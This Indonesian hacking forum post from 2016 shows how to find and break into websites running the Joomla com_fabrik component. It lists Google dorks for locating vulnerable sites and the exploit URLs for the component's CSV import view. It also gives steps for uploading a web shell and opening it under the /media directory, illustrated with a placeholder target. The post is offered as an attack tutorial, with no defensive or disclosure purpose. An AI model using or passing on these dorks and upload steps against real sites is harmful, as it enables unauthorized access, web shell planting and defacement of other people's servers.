05-23-2016, 03:56 AM
![[Image: bug.jpg]](https://1.bp.blogspot.com/-SlQEIGwywP0/Vx8cSITah2I/AAAAAAAAAs4/DVuJ3CGJ2u0-Lyb9Czj5PfvBKuLhFe5iACKgB/s320/bug.jpg)
yg dah Master Minggir dlu Bebz :heart:
Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
Exploit:
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
dan kebetulan ditarget Nue kali ini, Exploitnya terletak di:
target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
![[Image: etBWWqA.png]](http://img.prntscr.com/img?url=http://i.imgur.com/etBWWqA.png)
Tuh tinggal Upload Shell/File agan saja :D
Lalu Klik Import CSV
Shell/File Akses o.O ?? /media/namashell
cth: target.coli/media/nueenggakpernah.php
![[Image: vIHqkld.png]](http://img.prntscr.com/img?url=http://i.imgur.com/vIHqkld.png)
Yuk yang regional Jakarta Join Grup FB: BackBox Jakarta Team
xixihi kunjungin Blog ane juga yak :rolleyes: TKJ Cyber Art
semoga bermanfaat Gengs, maap kalo post cupu
![[Image: smile.png]](https://www.backboxindonesia.or.id/images/smilies/smile.png)
waktunya Nue dan tim Katakan Putus cabut dulu gengs,
![[Image: cool.png]](https://www.backboxindonesia.or.id/images/smilies/cool.png)
Bye~
SUMUR